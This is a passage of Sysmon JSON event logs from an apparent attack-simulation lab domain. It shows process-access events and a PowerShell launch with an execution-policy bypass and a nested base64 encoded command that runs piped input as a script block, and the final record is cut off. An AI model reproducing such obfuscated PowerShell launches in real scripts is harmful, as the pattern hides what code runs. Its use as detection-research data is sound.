{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.435\r\nSourceProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010631B1200}\r\nSourceProcessId: 3796\r\nSourceThreadId: 4948\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13D2-5F25-0000-0010A11D1200}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.435","SourceProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010631B1200}","SourceProcessId":"3796","SourceThreadId":"4948","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13D2-5F25-0000-0010A11D1200}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":9239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.448\r\nProcessGuid: {E2A3D6B1-13D2-5F25-0000-00106C1E1200}\r\nProcessId: 1360\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-13D2-5F25-0000-0020B61A1200}\r\nLogonId: 0x121AB6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-13D2-5F25-0000-0010A11D1200}\r\nParentProcessId: 4988\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.448","ProcessGuid":"{E2A3D6B1-13D2-5F25-0000-00106C1E1200}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-13D2-5F25-0000-0020B61A1200}","LogonId":"0x121ab6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-13D2-5F25-0000-0010A11D1200}","ParentProcessId":"4988","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmA